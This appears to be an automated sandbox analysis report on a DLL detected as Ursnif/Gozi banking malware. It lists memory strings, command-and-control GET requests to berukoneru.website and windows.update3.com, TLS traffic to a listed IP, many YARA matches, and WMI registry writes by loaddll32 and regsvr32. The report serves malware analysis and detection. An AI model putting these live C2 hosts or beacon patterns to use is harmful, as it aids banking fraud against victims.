Source: powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001A.00000002.657039685.000002DABC760000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: regsvr32.exe, 00000003.00000003.471060406.000000000338D000.00000004.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xdax"
Source: loaddll32.exe, 00000000.00000003.472229200.0000000000FF5000.00000004.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xvsU?ver=e636"
Source: powershell.exe, 00000018.00000002.705821003.00000164E2DF3000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: rundll32.exe, 00000005.00000003.470823286.0000000002F94000.00000004.00000001.sdmp String found in binary or memory: https://statics-marketingsites-eus-ms-com.akamaized.net/statics/override.css
Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.518452737.000000000333A000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520647340.0000000003333000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.527705942.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmp String found in binary or memory: https://windows.update3.com/
Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp String found in binary or memory: https://windows.update3.com/P
Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.518452737.000000000333A000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520647340.0000000003333000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmp String found in binary or memory: https://windows.update3.com/i
Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp String found in binary or memory: https://windows.update3.com/tire/vuHeqIQ3bqpSw_2Byc/c_2BB_2Fi/KRLpI_2FLMzbCYIdYZV9/wMp8vpBadTBEn6lom
Source: unknown DNS traffic detected: queries for: windows.update3.com
Source: global traffic HTTP traffic detected: GET /tire/jd_2FYT4kZR8w841QcBB1/tR81NFI9aRqohSRO/X0dydnORWplT5uR/5w00AG_2B_2FJ09dQQ/WUxRePiB4/GTOJFQ8FP8igXEjbgkH9/zEak3366_2FSVu5YatC/6c8yBLY3VgDZriaVuWUlRJ/NfUpYHR7DlV_2/FmC6rrvj/IWZqq_2FXZYrZ6Jfrjl4wOK/cOGNowVtID/CNlyDmEUAcdL6Nggn/Q6FP_2FvO/_2BU9JHdR/p.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/yIaXbfYof9IP/8B_2BPJ4_2B/hMnTiYTFHmvWMq/Om0JbLkmD_2F5koSu_2FY/nLk_2FKibFUJ9gOk/MZT8jf1B5RdC0UZ/6Z4No8ixNFmBVmH7Bj/uDf3BhOPM/DLBe_2Bd6mkqoP7YTIID/XBuFTJLHbx1D4QjnBWn/TnGiYGHPz2eGN6knS8Er2o/_2B5QVwmx2J_2/BE8gCb3N/ingbPXC9ZN_2BMhH2cvWH8p/CYnerQtz/Ddd.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uqJTyp4A5eQ/0U2GqSt0iiLbUx/HO3viOhQ8WkG8vbfTOB_2/BnaqEkGKFXXYKGIR/Ctbh99dX8lvtuYg/YlazQ5uDO_2FKEL9Q_/2BJjb_2Fo/n4TKwNU4Z7gGvATNQb4t/rYS_2FADS/RnX9qstM/g.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/qmvui3Jef80_2BIeM_2BXh/O_2By54KPinsD/_2BFfpah/5k89w5bXqU7DEWhQp1iBEy2/_2BnU_2FsR/sUo3C8aISdxyIYl8W/JynqV_2BmddH/AgiN2_2BUrO/VCPQbezXreMebQ/izeoYIW_2BTEh6B2Zh_2B/L3PgbMDpsuFq53n5/obVS_2BHmsXbkex/IxU7ONkaq6S5id4E4C/VTSP2pp87/7bclEnvP5UuFRz5_2FIN/q_2FKVUn/a3U.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/pXEvhesP8JJkQtOX4Z5G/OiJKf20ix2ZGR09v_2B/AwevbnlWqTi_2FbmjeIBIJ/B8iREIEDTHJ8C/QPwxSlTX/9Ss6_2FUQqUE8Rtt6tkm28v/8Qb_2FbAb4/RcCK4EpQ3Lh0e_2BV/nW7_2F9KVPTc/RWwFawwnn1T/NBQ509K2MeA0Zg/X_2BL3B2nl1ByESW4otQy/_2FmAs1Ly6/iqZ3GWXa.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/XmFjtmy1jR6lateNyuPVYzk/zqxAUph9t_/2FhKh_2BKiBZEq6Pk/avtEml_2FYjs/Y8y781fyUpX/C_2FGsjVf_2F1i/tI0L_2Fc4mVHQ5jOtMGU8/MLBmn_2F0B4RgjE1/vjwq5A2_2B3O0OF/2xAZRByvalCt4EW7PP/8v2xGWGrY/70z8u8ipgSqR2XldqMkC/Q_2FRHW9LM53wtTl2y8/wrMCO.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/tEXumA952Z/iljgXIorkNbq6MNPU/M3Mb2CH8XEAs/ZvNkij3gQew/dxKPUhxVjzkBtZ/B3kMEs_2FJYP69uLJ0Zru/_2BYjun6ZVTrWBF0/nSePp_2BxhkopWf/iGbA1ax9WTenbT0BwC/JetFByiwf/3LiswTAhhMHb0jpdGXHw/RYbbpWHEDIwmZCcWi7e/zfbtXmV0tr/6_2BifPd.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/gzRMSfagaZDYqNWCuNWpBQY/d3QH3HcNtD/fG3zb1_2FY310Wc1Z/tU68j9ArrsrY/cG2nzLaOesJ/1fJaUxYEiS_2Fq/6VuTPCoO1fL43Db5nwE4B/eNIHObz48Uk8thb4/s2ZGHDbOs4GyVjB/HB5iQTw6wsHP9eF2fL/ehbbJ4i3G/wutxyBgCPuYINeY4btAA/_2FftqK8_2FJ53N0BbQ/E4DqjTtkOXgod/z7et.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/k0k9N5zvmOwLqrZ9t/mA_2BT5LewRQ/XIHVxnLBVoU/TCE3xXfm5Bjx_2/FNwBkfDvRbJwwM4AJLewo/S2GmqFJJAf16v117/0Fd8Da4X45K7ewO/ZOOFQH9lFoxITYmiaW/UM4b3mHcB/fh9cKbdZnHyGiZkOZevh/xKEuDuLDKEmBX5F2T0A/HlQglDHz0FPghDE04k7Rtp/qlpZkGrY6jSqN/zGqWq5UgJ/rU.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/YD_2F3yJEGCuLOsTrEXJLr/HYLMnHFPJYjiw/7tKlG8tS/_2BbBwzFFUBrFGVOQLc5STZ/vcc52sXSbU/E9hymn9Lr8ZbD9qxB/Q3FPG7MgMTRh/kGaKVJ7xEwY/wcc7fc8ZQUc61Z/HBzqpDy8uRQEtHRcSSjiO/YH3881lPkApc1W7g/7TBJUbFugsSMYgd/TFU1BUGgDWNFTw3w_2/FKBKIQxkn/wyKgErA3/rpA.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf/nNbEHjkCSlyuZxandMk7W/125Nt4kKNIyzhV_2/FpQlU2nlzM_2FEI/PEryRBP68LWoGHV3sm/y9L4VUWvc/E0UlFXDmQ0_2F2mVHcN_/2B13NnOs91EWboOkL1Q/soeab74L05htIewL3_2FTu/VD2Jph.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/m4jBg57LO/F3omyPFCoq2BsJvvqQjq/M_2Frtvqdkes1JW5OTL/BNOx14m03YJ94TjlPw0PZA/GLczTuNVmCYMu/71GtDP5r/ukrg4HqiGfIkYNEYalZxMet/SDWbFyptRt/KM_2FafHnmbZCQsUs/pLVEK0s2DOMd/NxrlfGMBoYt/93NMnwEIHPr7kq/Wl1k8ZjV32EJB93_2FhHV/Qjw6VJUmVv/3MpXPnj1D/cD.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49812 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49813 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49819 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49822 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49825 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.518961591.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.664429538.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.517518068.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.520102514.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.470175062.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471268308.0000000005818000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.520620067.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.517906088.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.494184695.000000000543B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.470929059.00000000055B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519944178.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.493926850.0000000004DDB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.617274009.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.495487329.000000000395B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.518696418.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.494405815.000000000569B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.518133566.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.517688433.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.654830894.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.517563234.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.647561301.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 7016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7056, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5952, type: MEMORYSTR

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.518961591.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.664429538.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.517518068.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.520102514.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.470175062.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471268308.0000000005818000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.520620067.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.517906088.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.494184695.000000000543B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.470929059.00000000055B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519944178.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.493926850.0000000004DDB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.617274009.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.495487329.000000000395B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.518696418.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.494405815.000000000569B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.518133566.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.517688433.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.654830894.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.517563234.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.647561301.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 7016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7056, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5952, type: MEMORYSTR

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
PE file has a writeable .text section
Source: 61b85f75e6a7c.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
